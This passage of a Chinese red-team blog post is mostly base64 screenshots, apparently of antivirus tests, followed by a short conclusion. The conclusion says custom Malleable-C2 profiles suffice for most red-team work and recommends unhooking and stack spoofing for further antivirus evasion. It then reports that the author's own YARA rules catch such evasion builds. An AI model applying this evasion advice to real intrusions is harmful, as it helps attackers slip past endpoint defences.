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
</p>
<p>火绒</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<h2 id=0x05-结语>
 0x05 结语
 <a class=heading-link href=#0x05-%e7%bb%93%e8%af%ad>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h2>
<p>到此为止，配合一下自定义的Malleable-C2足以应付大部分红队场景，如果还想进一步，建议配合unhook、堆栈欺骗等技术</p>
<p>嘿嘿，如果你以为这就结束了，那就错了，如果说我针对Artifact Kit套件进行yara打标呢？以下是我找另一位师傅拿的它自己制作好的免杀马，上面是Elastic的检测，下面是自己针对Artifact Kit套件写的规则</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
 </div>
 <footer>
 
<section class=see-also>
 
 
 
 
 
</section>
 
 
 
 
 
 
 
 </footer>
 </article>
 
 </section>
 </div>
 <footer class=footer>
 <section class=container>
 ©
 
 2024
 Arui 
 ·
 
 Powered by <a href=https://gohugo.io/ target=_blank rel=noopener>Hugo</a> &amp; <a href=https://github.com/luizdepra/hugo-coder/ target=_blank rel=noopener>Coder</a>.
 
 </section>
 
 <span id=busuanzi_container_site_uv>本站总访问量<span id=busuanzi_value_site_uv></span>次</span>
</footer>
 </main>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
<div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha